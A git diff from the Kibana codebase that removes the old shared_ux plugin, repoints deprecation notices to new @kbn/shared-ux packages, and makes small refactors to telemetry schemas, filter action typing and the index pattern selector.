a/src/plugins/kibana_react/public/app_links/redirect_app_link.tsx b/src/plugins/kibana_react/public/app_links/redirect_app_link.tsx index 339055c3e1da5..6df1c43dbc5c6 100644 --- a/src/plugins/kibana_react/public/app_links/redirect_app_link.tsx +++ b/src/plugins/kibana_react/public/app_links/redirect_app_link.tsx @@ -35,7 +35,7 @@ interface RedirectCrossAppLinksProps extends React.HTMLAttributes = ({ diff --git a/src/plugins/kibana_react/public/exit_full_screen_button/exit_full_screen_button.tsx b/src/plugins/kibana_react/public/exit_full_screen_button/exit_full_screen_button.tsx index 33871742acbb3..f611c391a20a2 100644 --- a/src/plugins/kibana_react/public/exit_full_screen_button/exit_full_screen_button.tsx +++ b/src/plugins/kibana_react/public/exit_full_screen_button/exit_full_screen_button.tsx @@ -101,5 +101,5 @@ class ExitFullScreenButtonUi extends PureComponent { } } -/** @deprecated Use `ExitFullScreenButton` from `src/plugins/shared_ux/public`. */ +/** @deprecated Use `ExitFullScreenButton` from `@kbn/shared-ux-button-exit-full-screen`. */ export const ExitFullScreenButton = ExitFullScreenButtonUi; diff --git a/src/plugins/kibana_react/public/index.ts b/src/plugins/kibana_react/public/index.ts index 4b4c0b6e5ab20..2244d3d5503e0 100644 --- a/src/plugins/kibana_react/public/index.ts +++ b/src/plugins/kibana_react/public/index.ts @@ -82,7 +82,7 @@ export { reactToUiComponent, uiToReactComponent } from './adapters'; export { toMountPoint, MountPointPortal } from './util'; export type { ToMountPointOptions } from './util'; -/** @deprecated Use `RedirectAppLinks` from `@kbn/shared-ux-components */ +/** @deprecated Use `RedirectAppLinks` from `@kbn/shared-ux-link-redirect-app` */ export { RedirectAppLinks } from './app_links'; export { wrapWithTheme, KibanaThemeProvider } from './theme'; diff --git a/src/plugins/kibana_react/public/page_template/page_template.tsx b/src/plugins/kibana_react/public/page_template/page_template.tsx index bd5213c9a2608..44edccd8ea49b 100644 --- a/src/plugins/kibana_react/public/page_template/page_template.tsx +++ b/src/plugins/kibana_react/public/page_template/page_template.tsx @@ -21,7 +21,7 @@ import { KibanaPageTemplateInner, KibanaPageTemplateWithSolutionNav } from './pa /** * A thin wrapper around EuiPageTemplate with a few Kibana specific additions - * @deprecated Use `KibanaPageTemplateProps` from `kbn-shared-ux-components`. + * @deprecated Use `KibanaPageTemplateProps` from `@kbn/shared-ux-page-kibana-template-types`. */ export type KibanaPageTemplateProps = EuiPageTemplateProps & { /** @@ -42,7 +42,7 @@ export type KibanaPageTemplateProps = EuiPageTemplateProps & { noDataConfig?: NoDataPageProps; }; -/** @deprecated Use `KibanaPageTemplate` from `kbn-shared-ux-components`. */ +/** @deprecated Use `KibanaPageTemplate` from `@kbn/shared-ux-page-kibana-template`. */ export const KibanaPageTemplate: FunctionComponent = ({ template, className, diff --git a/src/plugins/kibana_usage_collection/server/collectors/management/schema.ts b/src/plugins/kibana_usage_collection/server/collectors/management/schema.ts index f1b230b72c337..97431c638273d 100644 --- a/src/plugins/kibana_usage_collection/server/collectors/management/schema.ts +++ b/src/plugins/kibana_usage_collection/server/collectors/management/schema.ts @@ -430,10 +430,6 @@ export const stackManagementSchema: MakeSchemaFrom = { type: 'boolean', _meta: { description: 'Non-default value of setting.' }, }, - 'observability:enableInfrastructureView': { - type: 'boolean', - _meta: { description: 'Non-default value of setting.' }, - }, 'observability:enableServiceGroups': { type: 'boolean', _meta: { description: 'Non-default value of setting.' }, diff --git a/src/plugins/kibana_usage_collection/server/collectors/management/types.ts b/src/plugins/kibana_usage_collection/server/collectors/management/types.ts index 1a946e99f29bd..1b7a64d0cc590 100644 --- a/src/plugins/kibana_usage_collection/server/collectors/management/types.ts +++ b/src/plugins/kibana_usage_collection/server/collectors/management/types.ts @@ -41,7 +41,6 @@ export interface UsageStats { 'observability:enableNewSyntheticsView': boolean; 'observability:maxSuggestions': number; 'observability:enableComparisonByDefault': boolean; - 'observability:enableInfrastructureView': boolean; 'observability:enableServiceGroups': boolean; 'visualize:enableLabs': boolean; 'visualization:heatmap:maxBuckets': number; diff --git a/src/plugins/presentation_util/public/components/solution_toolbar/index.ts b/src/plugins/presentation_util/public/components/solution_toolbar/index.ts index 5828abda1107f..ee60678af5d87 100644 --- a/src/plugins/presentation_util/public/components/solution_toolbar/index.ts +++ b/src/plugins/presentation_util/public/components/solution_toolbar/index.ts @@ -7,5 +7,5 @@ */ export { SolutionToolbar } from './solution_toolbar'; -/** @deprecated QuickButtonGroup - use `IconButtonGroup` from `@kbn/shared-ux-components */ +/** @deprecated QuickButtonGroup - use `IconButtonGroup` from `@kbn/shared-ux-button-toolbar` */ export * from './items'; diff --git a/src/plugins/shared_ux/.i18nrc.json b/src/plugins/shared_ux/.i18nrc.json deleted file mode 100755 index cd7ac5b866df2..0000000000000 --- a/src/plugins/shared_ux/.i18nrc.json +++ /dev/null @@ -1,9 +0,0 @@ -{ - "prefix": "sharedUX", - "paths": { - "sharedUX": "." - }, - "translations": [ - "translations/ja-JP.json" - ] -} diff --git a/src/plugins/shared_ux/README.md b/src/plugins/shared_ux/README.md deleted file mode 100755 index 748414c356e9b..0000000000000 --- a/src/plugins/shared_ux/README.md +++ /dev/null @@ -1,29 +0,0 @@ -# sharedUX - -Our mission is to make consistency in our user experience a product. - -## Areas of Focus - -### UX Infrastructure - -- Create and maintain a discoverable home for shared UX code. -- Encourage contribution and usage. - -### UX Patterns - -- Work with design specialists to understand and communicate new and existing designs. -- Foster adoption of design principles by codifying them in shared resources. - -### UX Solutions - -- Drive common projects. -- Build and support common plugins. -- Help teams to create consistent user experiences. - -## The sharedUX Plugin - -This plugin contains common code that is shared among other plugins. - -## Contribution - -Contributions are welcome and encouraged! \ No newline at end of file diff --git a/src/plugins/shared_ux/docs/about.mdx b/src/plugins/shared_ux/docs/about.mdx deleted file mode 100644 index 213ce774be217..0000000000000 --- a/src/plugins/shared_ux/docs/about.mdx +++ /dev/null @@ -1,36 +0,0 @@ ---- -id: sharedUX/About -slug: /shared-ux/about -title: About Shared UX -description: . -date: 2021-01-05 -tags: ['shared-ux'] ---- - -Our mission is to make consistency in our user experience a product. - -## Areas of Focus - -### UX Infrastructure - -- Create and maintain a discoverable home for shared UX code. -- Encourage contribution and usage. - -### UX Patterns - -- Work with design specialists to understand and communicate new and existing designs. -- Foster adoption of design principles by codifying them in shared resources. - -### UX Solutions - -- Drive common projects. -- Build and support common plugins. -- Help teams to create consistent user experiences. - -## The sharedUX Plugin - -This plugin contains common code that is shared among other plugins. - -## Contribution - -Contributions are welcome and encouraged! diff --git a/src/plugins/shared_ux/kibana.json b/src/plugins/shared_ux/kibana.json deleted file mode 100755 index 308a252f70b54..0000000000000 --- a/src/plugins/shared_ux/kibana.json +++ /dev/null @@ -1,14 +0,0 @@ -{ - "id": "sharedUX", - "version": "1.0.0", - "kibanaVersion": "kibana", - "owner": { - "name": "Shared UX", - "githubTeam": "shared-ux" - }, - "description": "A plugin providing components and services for shared user experiences in Kibana.", - "server": true, - "ui": true, - "requiredPlugins": ["dataViewEditor", "dataViews"], - "optionalPlugins": [] -} diff --git a/src/plugins/shared_ux/nav_shared_ux.docnav.json b/src/plugins/shared_ux/nav_shared_ux.docnav.json deleted file mode 100644 index 8f6ad010a49cb..0000000000000 --- a/src/plugins/shared_ux/nav_shared_ux.docnav.json +++ /dev/null @@ -1,17 +0,0 @@ -{ - "mission": "Shared UX", - "id": "sharedUX", - "landingPageId": "sharedUX/About", - "icon": "globe", - "description": "Developer documentation for Shared UX.", - "items": [ - { - "label": "About", - "items": [ - { - "id": "sharedUX/About" - } - ] - } - ] -} diff --git a/src/plugins/shared_ux/public/index.ts b/src/plugins/shared_ux/public/index.ts deleted file mode 100755 index 1dcf84eaf4991..0000000000000 --- a/src/plugins/shared_ux/public/index.ts +++ /dev/null @@ -1,18 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { SharedUXPlugin } from './plugin'; - -/** - * Creates the Shared UX plugin. - */ -export function plugin() { - return new SharedUXPlugin(); -} - -export type { SharedUXPluginSetup, SharedUXPluginStart } from './types'; diff --git a/src/plugins/shared_ux/public/mocks.ts b/src/plugins/shared_ux/public/mocks.ts deleted file mode 100644 index c77236d503ca9..0000000000000 --- a/src/plugins/shared_ux/public/mocks.ts +++ /dev/null @@ -1,23 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { SharedUXPlugin } from './plugin'; - -export type Setup = jest.Mocked>; -export type Start = jest.Mocked>; - -const createStartContract = (): jest.Mocked => { - const startContract = { - getContextServices: jest.fn(), - }; - return startContract; -}; - -export const sharedUXPluginMock = { - createStartContract, -}; diff --git a/src/plugins/shared_ux/public/plugin.ts b/src/plugins/shared_ux/public/plugin.ts deleted file mode 100755 index 8806de85b9304..0000000000000 --- a/src/plugins/shared_ux/public/plugin.ts +++ /dev/null @@ -1,39 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { CoreSetup, CoreStart, Plugin } from '@kbn/core/public'; -import { - SharedUXPluginSetup, - SharedUXPluginStart, - SharedUXPluginStartDeps, - SharedUXPluginSetupDeps, -} from './types'; - -import { servicesFactory } from './services'; - -/** - * The Kibana plugin for Shared User Experience (Shared UX). - */ -export class SharedUXPlugin implements Plugin { - public setup( - _coreSetup: CoreSetup, - _setupPlugins: SharedUXPluginSetupDeps - ): SharedUXPluginSetup { - return {}; - } - - public start(coreStart: CoreStart, startPlugins: SharedUXPluginStartDeps): SharedUXPluginStart { - const services = servicesFactory({ coreStart, startPlugins }); - - return { - getContextServices: () => services, - }; - } - - public stop() {} -} diff --git a/src/plugins/shared_ux/public/services/application.ts b/src/plugins/shared_ux/public/services/application.ts deleted file mode 100644 index 95d6d4b4d72d9..0000000000000 --- a/src/plugins/shared_ux/public/services/application.ts +++ /dev/null @@ -1,25 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { SharedUxApplicationService } from '@kbn/shared-ux-services'; - -import { KibanaPluginServiceFactory } from './types'; -import { SharedUXPluginStartDeps } from '../types'; - -export type ApplicationServiceFactory = KibanaPluginServiceFactory< - SharedUxApplicationService, - SharedUXPluginStartDeps ->; - -/** - * A factory function for creating a Kibana-based implementation of `SharedUXEditorsService`. - */ -export const applicationServiceFactory: ApplicationServiceFactory = ({ coreStart }) => ({ - navigateToUrl: coreStart.application.navigateToUrl, - currentAppId$: coreStart.application.currentAppId$, -}); diff --git a/src/plugins/shared_ux/public/services/data.ts b/src/plugins/shared_ux/public/services/data.ts deleted file mode 100644 index d68d35848e812..0000000000000 --- a/src/plugins/shared_ux/public/services/data.ts +++ /dev/null @@ -1,25 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { SharedUxDataService } from '@kbn/shared-ux-services'; -import { KibanaPluginServiceFactory } from './types'; -import { SharedUXPluginStartDeps } from '../types'; - -export type DataServiceFactory = KibanaPluginServiceFactory< - SharedUxDataService, - SharedUXPluginStartDeps ->; - -/** - * A factory function for creating a Kibana-based implementation of `SharedUXDataService`. - */ -export const dataServiceFactory: DataServiceFactory = ({ coreStart, startPlugins }) => ({ - hasDataView: startPlugins.dataViews.hasData.hasDataView, - hasESData: startPlugins.dataViews.hasData.hasESData, - hasUserDataView: startPlugins.dataViews.hasData.hasUserDataView, -}); diff --git a/src/plugins/shared_ux/public/services/doc_links.ts b/src/plugins/shared_ux/public/services/doc_links.ts deleted file mode 100644 index b457cddb7c3bc..0000000000000 --- a/src/plugins/shared_ux/public/services/doc_links.ts +++ /dev/null @@ -1,24 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { SharedUxDocLinksService } from '@kbn/shared-ux-services'; - -import { KibanaPluginServiceFactory } from './types'; -import { SharedUXPluginStartDeps } from '../types'; - -export type DocLinksServiceFactory = KibanaPluginServiceFactory< - SharedUxDocLinksService, - SharedUXPluginStartDeps ->; - -/** - * A factory function for creating a Kibana-based implementation of `SharedUXEditorsService`. - */ -export const docLinksServiceFactory: DocLinksServiceFactory = ({ coreStart }) => ({ - dataViewsDocLink: coreStart.docLinks.links.indexPatterns?.introduction, -}); diff --git a/src/plugins/shared_ux/public/services/editors.ts b/src/plugins/shared_ux/public/services/editors.ts deleted file mode 100644 index 498b42954091c..0000000000000 --- a/src/plugins/shared_ux/public/services/editors.ts +++ /dev/null @@ -1,24 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { SharedUxEditorsService } from '@kbn/shared-ux-services'; - -import { KibanaPluginServiceFactory } from './types'; -import { SharedUXPluginStartDeps } from '../types'; - -export type EditorsServiceFactory = KibanaPluginServiceFactory< - SharedUxEditorsService, - SharedUXPluginStartDeps ->; - -/** - * A factory function for creating a Kibana-based implementation of `SharedUXEditorsService`. - */ -export const editorsServiceFactory: EditorsServiceFactory = ({ startPlugins }) => ({ - openDataViewEditor: startPlugins.dataViewEditor.openEditor, -}); diff --git a/src/plugins/shared_ux/public/services/http.ts b/src/plugins/shared_ux/public/services/http.ts deleted file mode 100644 index afc2f00713988..0000000000000 --- a/src/plugins/shared_ux/public/services/http.ts +++ /dev/null @@ -1,24 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { SharedUxHttpService } from '@kbn/shared-ux-services'; - -import { KibanaPluginServiceFactory } from './types'; -import { SharedUXPluginStartDeps } from '../types'; - -export type HttpServiceFactory = KibanaPluginServiceFactory< - SharedUxHttpService, - SharedUXPluginStartDeps ->; - -/** - * A factory function for creating a Kibana-based implementation of `SharedUXEditorsService`. - */ -export const httpServiceFactory: HttpServiceFactory = ({ coreStart }) => ({ - addBasePath: coreStart.http.basePath.prepend, -}); diff --git a/src/plugins/shared_ux/public/services/index.ts b/src/plugins/shared_ux/public/services/index.ts deleted file mode 100644 index c8a572c262518..0000000000000 --- a/src/plugins/shared_ux/public/services/index.ts +++ /dev/null @@ -1,36 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { SharedUxServices } from '@kbn/shared-ux-services'; - -import type { SharedUXPluginStartDeps } from '../types'; -import type { KibanaPluginServiceFactory } from './types'; - -import { platformServiceFactory } from './platform'; -import { userPermissionsServiceFactory } from './permissions'; -import { editorsServiceFactory } from './editors'; -import { docLinksServiceFactory } from './doc_links'; -import { httpServiceFactory } from './http'; -import { applicationServiceFactory } from './application'; -import { dataServiceFactory } from './data'; - -/** - * A factory function for creating a Kibana-based implementation of `SharedUXServices`. - */ -export const servicesFactory: KibanaPluginServiceFactory< - SharedUxServices, - SharedUXPluginStartDeps -> = (params) => ({ - platform: platformServiceFactory(params), - permissions: userPermissionsServiceFactory(params), - editors: editorsServiceFactory(params), - docLinks: docLinksServiceFactory(params), - http: httpServiceFactory(params), - application: applicationServiceFactory(params), - data: dataServiceFactory(params), -}); diff --git a/src/plugins/shared_ux/public/services/permissions.ts b/src/plugins/shared_ux/public/services/permissions.ts deleted file mode 100644 index 694405b5c6610..0000000000000 --- a/src/plugins/shared_ux/public/services/permissions.ts +++ /dev/null @@ -1,27 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { SharedUxUserPermissionsService } from '@kbn/shared-ux-services'; -import { KibanaPluginServiceFactory } from './types'; -import { SharedUXPluginStartDeps } from '../types'; - -export type UserPermissionsServiceFactory = KibanaPluginServiceFactory< - SharedUxUserPermissionsService, - SharedUXPluginStartDeps ->; - -/** - * A factory function for creating a Kibana-based implementation of `SharedUXPermissionsService`. - */ -export const userPermissionsServiceFactory: UserPermissionsServiceFactory = ({ - coreStart, - startPlugins, -}) => ({ - canCreateNewDataView: startPlugins.dataViewEditor.userPermissions.editDataView(), - canAccessFleet: coreStart.application.capabilities.navLinks.integrations, -}); diff --git a/src/plugins/shared_ux/public/services/platform.ts b/src/plugins/shared_ux/public/services/platform.ts deleted file mode 100644 index b0ee61583dd8d..0000000000000 --- a/src/plugins/shared_ux/public/services/platform.ts +++ /dev/null @@ -1,26 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { SharedUxPlatformService } from '@kbn/shared-ux-services'; -import { SharedUXPluginStartDeps } from '../types'; -import { KibanaPluginServiceFactory } from './types'; - -/** - * A factory function for creating a Kibana-based implementation of `SharedUXPlatformService`. - */ -export type PlatformServiceFactory = KibanaPluginServiceFactory< - SharedUxPlatformService, - SharedUXPluginStartDeps ->; - -/** - * A factory function for creating a Kibana-based implementation of `SharedUXPlatformService`. - */ -export const platformServiceFactory: PlatformServiceFactory = ({ coreStart }) => ({ - setIsFullscreen: (isVisible: boolean) => coreStart.chrome.setIsVisible(isVisible), -}); diff --git a/src/plugins/shared_ux/public/services/types.ts b/src/plugins/shared_ux/public/services/types.ts deleted file mode 100644 index 895b2fb231a37..0000000000000 --- a/src/plugins/shared_ux/public/services/types.ts +++ /dev/null @@ -1,33 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { BehaviorSubject } from 'rxjs'; -import { CoreStart, AppUpdater, PluginInitializerContext } from '@kbn/core/public'; - -/** - * Parameters necessary to create a Kibana-based service, (e.g. during Plugin - * startup or setup). - * - * The `Start` generic refers to the specific Plugin `TPluginsStart`. - */ -export interface KibanaPluginServiceParams { - coreStart: CoreStart; - startPlugins: Start; - appUpdater?: BehaviorSubject; - initContext?: PluginInitializerContext; -} - -/** - * A factory function for creating a Kibana-based service. - * - * The `Service` generic determines the shape of the Service being produced. - * The `Start` generic refers to the specific Plugin `TPluginsStart`. - */ -export type KibanaPluginServiceFactory = ( - params: KibanaPluginServiceParams -) => Service; diff --git a/src/plugins/shared_ux/public/types/index.ts b/src/plugins/shared_ux/public/types/index.ts deleted file mode 100644 index e3e7cb760268f..0000000000000 --- a/src/plugins/shared_ux/public/types/index.ts +++ /dev/null @@ -1,67 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -/* eslint-disable @typescript-eslint/no-empty-interface */ - -import { SharedUxServices } from '@kbn/shared-ux-services'; -import { DataViewEditorStart } from '@kbn/data-view-editor-plugin/public'; -import { DataViewsPublicPluginStart } from '@kbn/data-views-plugin/public'; - -/** @internal */ -export interface SharedUXPluginSetup {} - -/** - * The Shared UX plugin public contract, containing prewired components, services, and - * other constructs useful to consumers. - */ -export interface SharedUXPluginStart { - /** - * A set of pre-wired services for use with `SharedUxServicesProvider`. - * - * ``` - * import { SharedUxServicesProvider } from '@kbn/shared-ux-services'; - * - * public start(coreStart: CoreStart, startPlugins: MyPluginStartDeps): MyPluginStart { - * const services = startPlugins.sharedUX.getContextServices(); - * return { - * ServicesContext: ({ children }) => {children}, - * }; - * } - * ``` - * - * or - * - * ``` - * import { SharedUxServicesProvider } from '@kbn/shared-ux-services'; - * - * public setup(coreSetup: CoreSetup, setupPlugins: MyPluginSetupDeps): MyPluginSetup { - * const [coreStart, startPlugins] = await coreSetup.getStartServices(); - * coreSetup.application.register({ - * mount: async (params: AppMountParameters) => { - * ReactDOM.render( - * - * - * , - * params.element - * ); - * } - * ); - * } - * ``` - */ - getContextServices: () => SharedUxServices; -} - -/** @internal */ -export interface SharedUXPluginSetupDeps {} - -/** @internal */ -export interface SharedUXPluginStartDeps { - dataViewEditor: DataViewEditorStart; - dataViews: DataViewsPublicPluginStart; -} diff --git a/src/plugins/shared_ux/server/index.ts b/src/plugins/shared_ux/server/index.ts deleted file mode 100755 index 44c72b244aaf9..0000000000000 --- a/src/plugins/shared_ux/server/index.ts +++ /dev/null @@ -1,16 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { PluginInitializerContext } from '@kbn/core/server'; -import { SharedUXPlugin } from './plugin'; - -export function plugin(initializerContext: PluginInitializerContext) { - return new SharedUXPlugin(initializerContext); -} - -export type { SharedUXPluginSetup, SharedUXPluginStart } from './types'; diff --git a/src/plugins/shared_ux/server/plugin.ts b/src/plugins/shared_ux/server/plugin.ts deleted file mode 100755 index f0ea504884610..0000000000000 --- a/src/plugins/shared_ux/server/plugin.ts +++ /dev/null @@ -1,31 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { PluginInitializerContext, CoreSetup, CoreStart, Plugin, Logger } from '@kbn/core/server'; - -import { SharedUXPluginSetup, SharedUXPluginStart } from './types'; - -export class SharedUXPlugin implements Plugin { - private readonly logger: Logger; - - constructor(initializerContext: PluginInitializerContext) { - this.logger = initializerContext.logger.get(); - } - - public setup(_core: CoreSetup) { - this.logger.debug('sharedUX: Setup'); - return {}; - } - - public start(_core: CoreStart) { - this.logger.debug('sharedUX: Started'); - return {}; - } - - public stop() {} -} diff --git a/src/plugins/shared_ux/server/types.ts b/src/plugins/shared_ux/server/types.ts deleted file mode 100755 index b16a18467d309..0000000000000 --- a/src/plugins/shared_ux/server/types.ts +++ /dev/null @@ -1,15 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -/* eslint-disable @typescript-eslint/no-empty-interface */ - -/** @internal */ -export interface SharedUXPluginSetup {} - -/** @internal */ -export interface SharedUXPluginStart {} diff --git a/src/plugins/shared_ux/tsconfig.json b/src/plugins/shared_ux/tsconfig.json deleted file mode 100644 index 3a287353a5341..0000000000000 --- a/src/plugins/shared_ux/tsconfig.json +++ /dev/null @@ -1,26 +0,0 @@ -{ - "extends": "../../../tsconfig.base.json", - "compilerOptions": { - "outDir": "./target/types", - "emitDeclarationOnly": true, - "declaration": true, - "declarationMap": true - }, - "include": [ - "common/**/*", - "public/**/*", - "server/**/*", - "../../../typings/**/*" - ], - "references": [ - { - "path": "../../core/tsconfig.json" - }, - { - "path": "../data_view_editor/tsconfig.json" - }, - { - "path": "../data_views/tsconfig.json" - } - ] -} diff --git a/src/plugins/telemetry/schema/oss_plugins.json b/src/plugins/telemetry/schema/oss_plugins.json index cacd8067e4e03..e59b192442133 100644 --- a/src/plugins/telemetry/schema/oss_plugins.json +++ b/src/plugins/telemetry/schema/oss_plugins.json @@ -8282,12 +8282,6 @@ "description": "Non-default value of setting." } }, - "observability:enableInfrastructureView": { - "type": "boolean", - "_meta": { - "description": "Non-default value of setting." - } - }, "observability:enableServiceGroups": { "type": "boolean", "_meta": { diff --git a/src/plugins/unified_search/public/actions/apply_filter_action.ts b/src/plugins/unified_search/public/actions/apply_filter_action.ts index e890cd94375c3..4f2900944f827 100644 --- a/src/plugins/unified_search/public/actions/apply_filter_action.ts +++ b/src/plugins/unified_search/public/actions/apply_filter_action.ts @@ -8,6 +8,7 @@ import { i18n } from '@kbn/i18n'; import { ThemeServiceSetup } from '@kbn/core/public'; +import type { IEmbeddable } from '@kbn/embeddable-plugin/public'; import { toMountPoint } from '@kbn/kibana-react-plugin/public'; import { Action, createAction, IncompatibleActionError } from '@kbn/ui-actions-plugin/public'; // for cleanup esFilters need to fix the issue https://github.com/elastic/kibana/issues/131292 @@ -21,9 +22,7 @@ export const ACTION_GLOBAL_APPLY_FILTER = 'ACTION_GLOBAL_APPLY_FILTER'; export interface ApplyGlobalFilterActionContext { filters: Filter[]; timeFieldName?: string; - // Need to make this unknown to prevent circular dependencies. - // Apps using this property will need to cast to `IEmbeddable`. - embeddable?: unknown; + embeddable?: IEmbeddable; // controlledBy is an optional key in filter.meta that identifies the owner of a filter // Pass controlledBy to cleanup an existing filter(s) owned by embeddable prior to adding new filters controlledBy?: string; diff --git a/src/plugins/unified_search/public/index_pattern_select/index_pattern_select.tsx b/src/plugins/unified_search/public/index_pattern_select/index_pattern_select.tsx index 81534575d10b1..7cd8b9d0251d8 100644 --- a/src/plugins/unified_search/public/index_pattern_select/index_pattern_select.tsx +++ b/src/plugins/unified_search/public/index_pattern_select/index_pattern_select.tsx @@ -78,10 +78,10 @@ export default class IndexPatternSelect extends Component { - const idsAndTitles = await this.props.indexPatternService.getIdsWithTitle(); + const dataViews = await this.props.indexPatternService.getIdsWithTitle(); if (!this.isMounted || searchValue !== this.state.searchValue) { return; } const options = []; - for (let i = 0; i < idsAndTitles.length; i++) { - if (idsAndTitles[i].title.toLowerCase().includes(searchValue.toLowerCase())) { + for (let i = 0; i < dataViews.length; i++) { + const label = dataViews[i].name ? dataViews[i].name : dataViews[i].title; + if (label && label.toLowerCase().includes(searchValue.toLowerCase())) { options.push({ - label: idsAndTitles[i].title, - value: idsAndTitles[i].id, + label, + value: dataViews[i].id, }); } } diff --git a/src/plugins/unified_search/tsconfig.json b/src/plugins/unified_search/tsconfig.json index 41dc76f1305be..61b1f83058821 100644 --- a/src/plugins/unified_search/tsconfig.json +++ b/src/plugins/unified_search/tsconfig.json @@ -17,6 +17,7 @@ { "path": "../../core/tsconfig.json" }, { "path": "../data/tsconfig.json" }, { "path": "../data_views/tsconfig.json" }, + { "path": "../embeddable/tsconfig.json" }, { "path": "../usage_collection/tsconfig.json" }, { "path": "../kibana_utils/tsconfig.json" }, { "path": "../kibana_react/tsconfig.json" }, diff --git a/src/plugins/vis_types/timeseries/public/application/components/lib/convert_series_to_vars.js b/src/plugins/vis_types/timeseries/public/application/components/lib/convert_series_to_vars.js index 4ac63bd8704bc..cccc21e7cbdb1 100644 --- a/src/plugins/vis_types/timeseries/public/application/components/lib/convert_series_to_vars.js +++ b/src/plugins/vis_types/timeseries/public/application/components/lib/convert_series_to_vars.js @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { startsWith, snakeCase } from 'lodash'; import { BUCKET_TYPES, DATA_FORMATTERS } from '../../../../common/enums'; import { getLastValue } from '../../../../common/last_value_utils'; diff --git a/src/plugins/vis_types/timeseries/public/application/components/vis_types/table/vis.js b/src/plugins/vis_types/timeseries/public/application/components/vis_types/table/vis.js index dc3922453a0e2..66a01793a0e96 100644 --- a/src/plugins/vis_types/timeseries/public/application/components/vis_types/table/vis.js +++ b/src/plugins/vis_types/timeseries/public/application/components/vis_types/table/vis.js @@ -10,7 +10,7 @@ import _, { isArray, last, get } from 'lodash'; import React, { Component } from 'react'; import { parse as parseUrl } from 'url'; import PropTypes from 'prop-types'; -import { RedirectAppLinks } from '@kbn/kibana-react-plugin/public'; +import { RedirectAppLinks } from '@kbn/shared-ux-link-redirect-app'; import { getMetricsField } from '../../lib/get_metrics_field'; import { createTickFormatter } from '../../lib/tick_formatter'; import { createFieldFormatter } from '../../lib/create_field_formatter'; @@ -271,15 +271,13 @@ class TableVis extends Component { return ( - - - {header} - {rows} -
+ +
+ + {header} + {rows} +
+
